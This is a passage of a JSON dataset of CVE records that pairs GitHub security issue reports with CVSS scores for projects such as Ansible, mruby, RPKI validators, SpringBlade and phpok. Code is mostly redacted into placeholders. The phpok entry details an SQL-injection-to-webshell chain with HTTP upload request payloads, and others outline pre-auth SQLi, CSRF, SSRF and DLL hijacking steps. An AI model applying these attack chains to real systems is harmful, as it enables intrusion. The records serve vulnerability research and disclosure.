        "description": "APITAG NUMBERTAG Security issues in net snmp. Dear all, In the course of a penetration test performed by our security analysts, we have noticed some security vulnerabilities in net snmp. Your deprecated bug tracker ( CVETAG redirects to Github. Sadly, Github does not support creating private issues for security relevant bugs. We would like to send you the findings in an encrypted manner to enable you to mitigate them. For encrypted communication, we can offer a web based platform hosted by us, or we can offer to encrypt our e mails via S/MIME or PGP. Please let us know which method fits you best. In order to transmit our findings via email, we will need either a public S/MIME certificate or your public PGP key of an active and trustworthy contributor of this project. As stated in our Responsible Disclosure Guideline (see URLTAG we will treat the vulnerabilities as confidential. We will grant you a time frame of NUMBERTAG days to release a patch. After that deadline, we will reserve the right to publish the vulnerabilities. Sincerely, usd responsible disclosure team APITAG About usd AG usd AG protects companies from hackers and criminals. As an accredited auditor, we consult and certify companies worldwide. Our work is as dynamic and diverse as current threats. We review IT systems, applications and processes for security vulnerabilities and help with their mitigation. With our Security Trainings, we raise security awareness; the CST Academy promotes an active dialogue and a transfer of knowledge. APITAG more security. usd APITAG Registered office NUMBERTAG Neu Isenburg Local court of Offenbach: HRB NUMBERTAG Executive Board: Andreas Duchmann, Manfred Tubach (CEO) Chairman supervisory board: Dr. Dietmar Kirchner VAT ID: DE NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-15866",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/5042",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/5042",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2020-07-20T21:23:46Z",
        "description": "Heap buffer overflow in mruby interpreter. A heap buffer overflow exists in APITAG function in APITAG triggered via APITAG . The bug can be reproduced on Ubuntu NUMBERTAG bit with ASAN enabled mruby. It has been reproduced with mruby compiled with different compiler toolchains: APITAG . The POC input and steps to reproduce are provided below. POC Input CODETAG Steps to reproduce CODETAG ASAN Report ERRORTAG Authors Prashast Srivastava APITAG University) , Mathias Payer (EPFL)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15890",
        "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/601",
        "Issue_Url_new": "https://github.com/luajit/luajit/issues/601",
        "Repo_new": "luajit/luajit",
        "Issue_Created_At": "2020-07-10T23:37:23Z",
        "description": "Segmentation fault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-15930",
        "Issue_Url_old": "https://github.com/laurent22/joplin/issues/3552",
        "Issue_Url_new": "https://github.com/laurent22/joplin/issues/3552",
        "Repo_new": "laurent22/joplin",
        "Issue_Created_At": "2020-07-23T21:23:41Z",
        "description": "Security Vulnerability. I'm opening this issue for future disclosure regarding the vulnerability reported via e mail.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-16143",
        "Issue_Url_old": "https://github.com/haiwen/seafile-client/issues/1309",
        "Issue_Url_new": "https://github.com/haiwen/seafile-client/issues/1309",
        "Repo_new": "haiwen/seafile-client",
        "Issue_Created_At": "2020-07-22T09:30:42Z",
        "description": "DLL Hijacking APITAG DLL: exchndl.dll Affected Process: FILETAG Tested on: Windows NUMBERTAG Pro NUMBERTAG ersion NUMBERTAG Description: Seafile Client ver NUMBERTAG is vulnerable to DLL hijacking because it loads APITAG from the directories listed in the %PATH% environment variable. Steps to reproduce NUMBERTAG Compile the following APITAG code and name the output dll file as APITAG NUMBERTAG Drop the APITAG in a writable directory in the %PATH% environment variable. APITAG in this case NUMBERTAG Execute Seafile by double clicking the Seafile icon on desktop or running FILETAG APITAG Files NUMBERTAG PATHTAG ) in cmd NUMBERTAG The APITAG will be executed. APITAG Code: CODETAG Screenshots: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-16162",
        "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/232",
        "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/232",
        "Repo_new": "ripe-ncc/rpki-validator-3",
        "Issue_Created_At": "2020-07-07T10:34:28Z",
        "description": "RIPE NCC Validator by default is insecure. According to documentation the default operating mode of the RIPE NCC Validator is APITAG , this means that by default the validator operates in an insecure mode which is detrimental to the users of the software. It is beyond me why I have to open so many tickets to encourage the developers of this software to produce something that is not an immediate and urgent risk to anyone using this software.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16162",
        "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/162",
        "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/162",
        "Repo_new": "ripe-ncc/rpki-validator-3",
        "Issue_Created_At": "2020-03-30T14:33:10Z",
        "description": "An expired or missing CRL doesn't result in the manifest being considered invalid. This issue was also informally reported to RIPE NCC staff in late February NUMBERTAG It appears that RIPE NCC validator doesn't consider an expired CRL cause to consider the associated manifest and underlaying objects invalid. It logs a warning, but does not consider this situation erroneous. Theoretically a replay attack can be executed by making the CRL unavailable in a monkey in the middle scenario. The RPKI data download procedure in\u00a0RIPE NCC's Validator must assume it is collecting untrusted data, which must be verified using the certificate verification model where an expired CRL means that none of the NUMBERTAG objects pointing to the CRL can be validated or considered valid. Some more (hard to read) context is available in the RPKI standards forum at IETF via URLTAG and specifically URLTAG If the CRL is expired, the manifest & directory should not be considered eligible for further processing and the associated VRPs should not be emitted to the RTR process. Manifests and CRLs compliment each other, manifests are not a replacement for CRLs. The manifest specification assumes a sensible policy regarding CRL expiration is applied. Since RPKI does not have any other certificate revocation mechanisms other than CRLs (there is no OSCP and other tricks in the specs) I believe that ignoring the CRLs expiration date opens up RIPE NCC's validator for replay attacks which can have adverse operational consequences (aka an attacker has the ability to flip BGP routes from valid to invalid ) For transparency reasons: I'm filing this bug so I can reference it later on in a write up about how these validation issues were handled.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16163",
        "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/159",
        "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/159",
        "Repo_new": "ripe-ncc/rpki-validator-3",
        "Issue_Created_At": "2020-03-24T13:45:25Z",
        "description": "RRDP fetches should not proceed if the TLS HTTPS endpoint doesn't validate. RFC NUMBERTAG section NUMBERTAG HTTPS Considerations\" states: > Because of this, Relying Parties SHOULD do TLS certificate and host name validation when they fetch from an RRDP Repository Server. The SHOULD probably should be read as a MUST , given the validator's susceptibility to fetch from a compromised (MITM'ed) RRDP service especially when combined with a partial withholding attack. Note: checking the TLS certs of the RRDP channel makes MITM's harder but not impossible! More work is needed in the validation procedure regardless of fixing this TLS RRDP issue. Recommendation: APITAG should be changed to APITAG in the default distribution & settings. It is hard to imagine a scenario where one would want to disable TLS certificate validation.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16164",
        "Issue_Url_old": "https://github.com/RIPE-NCC/rpki-validator-3/issues/158",
        "Issue_Url_new": "https://github.com/ripe-ncc/rpki-validator-3/issues/158",
        "Repo_new": "ripe-ncc/rpki-validator-3",
        "Issue_Created_At": "2020-03-23T17:35:24Z",
        "description": "Missing files don't result in a manifest being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain .roa files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach valid, except the data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-16165",
        "Issue_Url_old": "https://github.com/chillzhuang/SpringBlade/issues/9",
        "Issue_Url_new": "https://github.com/chillzhuang/springblade/issues/9",
        "Repo_new": "chillzhuang/springblade",
        "Issue_Created_At": "2020-07-25T13:56:47Z",
        "description": "Pre auth SQL injection. tl;dr Flaws in DAO/DTO implementation allows SQLi in order by clause. User token and/or password hash disclosed in pre auth APIs of which are vulnerable to SQLi above as well. detail APITAG is exposed by default install. For instance, the demo site. FILETAG Refresh token can be used to exchange for a valid jwt ticket, or in a different way to compromise user account, log in with credential cracked from leaking md5 hash. Before actually stepping into the system, let's see what's else we could find on this API. Request handling looks a lot like this CODETAG APITAG casts a few params to Int and replace 'bad words' with blank string in 'ascs' and 'desc' (which are then pasted into order by clause) CODETAG the APITAG thing is a sort of indicator for batis data model, apart from being a type indicator it is in charge of building statement. after a few delegates and overrides it gets invoked in the way below CODETAG Only seen tokenization stuffs in APITAG At this stage, pre auth visitors can perform SQLi by providing malicious query.get FILETAG this gets you current db user. APITAG post script the actul PATHTAG sets a fixed \"desc\", is vulne to malicious \"ascs\" only. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16248",
        "Issue_Url_old": "https://github.com/prometheus/blackbox_exporter/issues/669",
        "Issue_Url_new": "https://github.com/prometheus/blackbox_exporter/issues/669",
        "Repo_new": "prometheus/blackbox_exporter",
        "Issue_Created_At": "2020-08-03T02:20:15Z",
        "description": "Prometheus Blackbox Exporter through NUMBERTAG allows /probe?target= SSRF. . SSRF Vulnerablity During the company's penetration test, it was found that the Blackbox > Exporter service was opened on the Internet, which led to the ssrf > detection of the company's internal network > > Set up the Blackbox Exporter test environment, and then visit: > > URLTAG > > > Blackbox Exporter logs service jump will be displayed > URLTAG > > As long as the target is replaced, the service of detecting internal > service weakness can be realized > > Also supports other protocols > Blackbox Exporter is a service to test the state of network > connectivity. If it is configured incorrectly, SSRF can detect weak > services and applications in the internal network. CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.8,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16252",
        "Issue_Url_old": "https://github.com/ankane/field_test/issues/28",
        "Issue_Url_new": "https://github.com/ankane/field_test/issues/28",
        "Repo_new": "ankane/field_test",
        "Issue_Created_At": "2020-08-04T20:05:09Z",
        "description": "CSRF Vulnerability with Non Session Based Authentication. The Field Test dashboard is vulnerable to cross site request forgery (CSRF) with non session based authentication methods. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG Impact The Field Test dashboard is vulnerable to CSRF with non session based authentication methods, like basic authentication. Session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, a single endpoint is affected, which allows for changing the variant assigned to a user. All users running an affected release should upgrade immediately. Technical Details Field Test uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-16253",
        "Issue_Url_old": "https://github.com/ankane/pghero/issues/330",
        "Issue_Url_new": "https://github.com/ankane/pghero/issues/330",
        "Repo_new": "ankane/pghero",
        "Issue_Created_At": "2020-08-04T19:31:45Z",
        "description": "CSRF Vulnerability. APITAG is vulnerable to cross site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact The APITAG dashboard is vulnerable to cross site request forgery (CSRF). This affects the Docker image, Linux packages, and in specific cases, the Rails gem. The Rails gem is vulnerable with non session based authentication methods like basic authentication session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include NUMBERTAG Canceling running queries NUMBERTAG Running EXPLAIN on queries (without seeing the results, but can be used for denial of service and other attacks NUMBERTAG Resetting query stats (running APITAG ) All users running an affected release should upgrade immediately. Credits Thanks to Heiko Webers of FILETAG for reporting this. Technical Details APITAG uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-16254",
        "Issue_Url_old": "https://github.com/ankane/chartkick/issues/546",
        "Issue_Url_new": "https://github.com/ankane/chartkick/issues/546",
        "Repo_new": "ankane/chartkick",
        "Issue_Created_At": "2020-08-04T20:29:47Z",
        "description": "CSS injection with width and height options. The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the width or height option. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to CSS injection if user input is passed to the width or height option. APITAG An attacker can set additional CSS properties, like: APITAG All users running an affected release should upgrade. Technical Details Chartkick used APITAG to escape the width and height. This prevents XSS, but does not escape semicolons, which allows CSS additional properties to be set. Chartkick now limits width and height values to alphanumeric and % (this prevents some valid values like APITAG but keeps things simple).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-16269",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17383",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17383",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2020-07-31T00:14:52Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-16610",
        "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/53",
        "Issue_Url_new": "https://github.com/havok89/hoosk/issues/53",
        "Repo_new": "havok89/hoosk",
        "Issue_Created_At": "2020-04-12T01:21:37Z",
        "description": "CSRF issue that allows attacker to delete an account. Hi,bro.I also find an csrf issue in admin page. When attacker induce authenticated admin user to a malicious web page, any accounts can be deleted without admin user's intention. how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content CODETAG userid is very easy to guess. APITAG account userid = userid is delete without admin user's intention. how to fix this issue. set csrf token to protect delete function.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-16629",
        "Issue_Url_old": "https://github.com/Gh0stF/phpok_cve/issues/1",
        "Issue_Url_new": "https://github.com/gh0stf/phpok_cve/issues/1",
        "Repo_new": "gh0stf/phpok_cve",
        "Issue_Created_At": "2020-02-06T05:33:40Z",
        "description": "phpokcms Sqli To Getshell. Problem location: Here is the injection point framework / API / APITAG The main operation is to save the file upload information to the database. $upload = $this >lib('upload') >upload('upfile'); if (!$upload || !$upload FILETAG FILETAG You can see this Sql information: INSERT INTO qinggan_res ( APITAG , folder , name , ext , filename , addtime , title , APITAG , attr , APITAG , APITAG ) VALUES( PATHTAG ) Then the injection point has appeared, using method: APITAG can call the controller and its methods through FILETAG , and there is an attachment replacement method at PATHTAG which queries the old file name from the database, then deletes the corresponding file to the disk, and adds the newly uploaded file. We can see the key method of attachment replacement It is located in framework / LIBS / APITAG NUMBERTAG as follows: public function mv($old,$new,$recover=true) { if(!file_exists($old)){ return false; } if(substr($new NUMBERTAG this >make($new,\"dir\"); }else{ $this >make($new,\"file\"); } if(file_exists($new)){ if($recover){ unlink($new); }else{ return false; } }else{ $new = APITAG } rename($old,$new); return true; } As you can see, although it's an attachment replacement, it doesn't matter if the source attachment doesn't exist. It's still written normally. So the idea from injection to getshell is: inject an attachment data through SQL, the file type is PHP, and then call the attachment replacement function through FILETAG , you can write a PHP file to the target path. Then payload is as follows POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" FILETAG FILETAG However , In the upload part, there are two bytes of file header detection FILETAG So we need to add two bytes of picture header, URL encoded as NUMBERTAG p So payload is like this POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" image/png APITAG Content Disposition: form data; APITAG Wed Sep NUMBERTAG GMT NUMBERTAG APITAG Standard Time) APITAG Content Disposition: form data; name=\"size NUMBERTAG APITAG Content Disposition: form data; name=\"upfile\"; APITAG Content Type: image/png \u0089P APITAG APITAG FILETAG Boom! We can see the APITAG is really successfully output on page ! FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-16632",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/12",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/12",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2020-04-29T17:32:07Z",
        "description": "XSS and CSRF Vulnerability exists in the file of APITAG NUMBERTAG SP2 version. When common user send this malicious URL to the web manager and request it, the web manager could be executed the malicious javascript code FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-16843",
        "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2057",
        "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2057",
        "Repo_new": "firecracker-microvm/firecracker",
        "Issue_Created_At": "2020-08-03T09:01:39Z",
        "description": "Firecracker NUMBERTAG and NUMBERTAG network stack can freeze under heavy ingress traffic. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG irtio net emulation. Issue Description Under heavy network ingress traffic, when the host TAP interface's receive queue is not drained and the guest virtio net device's receive queue is full, the APITAG network interface ingress can freeze. There is no possibility to recover from this state, resulting in a denial of service on the APITAG when it is configured with a single network interface, and causing an availability problem for the APITAG network interface on which the issue is triggered. This issue is difficult to reproduce with TCP traffic. The TCP congestion algorithm makes it harder to fill both the TAP interface and virtio receive queues. Impact When this issue is triggered, the guest kernel network interface will no longer receive packets. Vulnerable Systems Firecracker releases NUMBERTAG and NUMBERTAG are affected.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-1733",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67791",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67791",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:46:31Z",
        "description": "Insecure creation of temporary directory for become_user. SUMMARY CVETAG We create a temporary directory for the APITAG with APITAG in APITAG without first checking if the directory exists and that it has the expected permissions. Relevant code URLTAG We need to validate the parent directories are as expected before creating directories in those paths and fail if the permissions and/or ACLs are not what we expect. ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.7,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-1734",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67792",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67792",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:48:32Z",
        "description": "pipe lookup plugin enables shell by default. SUMMARY CVETAG The pipe lookup plugin should use APITAG be default to avoid potential privilege escalation. A new option should provide a way to enable APITAG . If a variable is passed to the pipe lookup, that variable could be overriden via facts, leading to arbitrary code execution. Relevant code: URLTAG It seems like this change was made intentionally quite a while ago ( URLTAG Changing the default will probably break a lot of things for people. \ud83d\ude1e ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 6.0,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-1735",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67793",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67793",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:50:23Z",
        "description": "Fetch module path traversal. SUMMARY CVETAG Possibly related to CVETAG ( URLTAG The fetch module takes the source result from the slurp module, which came from the remote host. We don't really validate this path and it could have been manipulated by the remote host in a malicious way such that we end up a path similar to APITAG for the source. This allows an attacker to place a file the contents of which they control. Relevant Code: URLTAG Suggested correction from the reporter: Don't use APITAG to compute the destination file or clean the last argument add the following check: CODETAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 2.7,
        "exploitabilityScore": 1.5
    },
    {
        "CVE_ID": "CVE-2020-1736",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67794",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67794",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:54:05Z",
        "description": "The default permissions used by atomic_move create files that are world readable . SUMMARY CVETAG If a file doesn't exist, we create it with APITAG permissions combined with the current umask . Depending on the default umask as well as the permissions on the destination directory, this could result in world readable files. Relevant code: Default permissions: URLTAG creation in APITAG : URLTAG ERRORTAG Suggested correction is to use more restrictive permissions by default and/or add a mechanism to prevent creating wold readable files. ISSUE TYPE Bug Report COMPONENT NAME ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-17366",
        "Issue_Url_old": "https://github.com/NLnetLabs/routinator/issues/319",
        "Issue_Url_new": "https://github.com/nlnetlabs/routinator/issues/319",
        "Repo_new": "nlnetlabs/routinator",
        "Issue_Created_At": "2020-04-28T14:53:53Z",
        "description": "Missing files don't result in a Manifest/PP being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain APITAG files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach eligible for further validation, except any data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not. To offer an example: In manifest APITAG , a number of ROAs and a CRL are referenced: CODETAG If an attacker withholds all but APITAG , so the MITM does the equivalent of: CODETAG and the validator does not consider APITAG in its entirety invalid due to one or more missing APITAG or APITAG files, in this specific example the remaining ROA will render all BGP announcements equal to or covered under APITAG invalid . This results in actual downtime in real networks. If the manifest (which references a missing APITAG file in its entirety is ignored or considered invalid), the remaining APITAG ROA which would've been transformed into VRP APITAG is also ignored. This renders all BGP announcements under that NUMBERTAG APITAG rather than invalid , which is a preferable situation. APITAG now has a patch where if a file is referenced the manifest, but is missing (either due to CA operational error, or because of a MITM attack we can't differentiate the two), that specific manifest is considered invalid. It will depend on the structure of how CA Certificate trees whether this measure is sufficient or whether a single missing file has to result in the entire publication point being considered invalid. But until we have more information about other attack vectors, I recommend that a manifest as a whole is considered invalid, when it references a non existing or wrongly checksummed file. The onus is on the CA publication points to publish correct valid RPKI data, the validator's can't be expected to compensate for CA operator errors (or MITM attacks) An additional check is needed: if one of the .roa files a manifest references is corrupt (the MITM didn't _delete_ strategically file, but filled some .roa files with garbage): ERRORTAG corrupting that one .roa file results in an incomplete (operationally problematic) set of VRPs: CODETAG In the above eaxmple there should be NUMBERTAG RPs in total, APITAG contained NUMBERTAG RPs. In summary: If a manifests references a non existing file, or if there is a checksum mismatch between the hash described in the manifest and the hash as derived from the .roa file, the RP MUST consider the whole manifest invalid and not produce VRPs with the remaining .roa files.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-1737",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/67795",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/67795",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2020-02-26T19:55:42Z",
        "description": "win_unzip path traversal with specially crafted archive. SUMMARY CVETAG A specially crafted zip archive could result in path traversal in the ERRORTAG module. The APITAG function doesn't check if the extracted path belongs to the destination folder. A possible solution is to FILETAG . ISSUE TYPE Bug Report COMPONENT NAME ERRORTAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
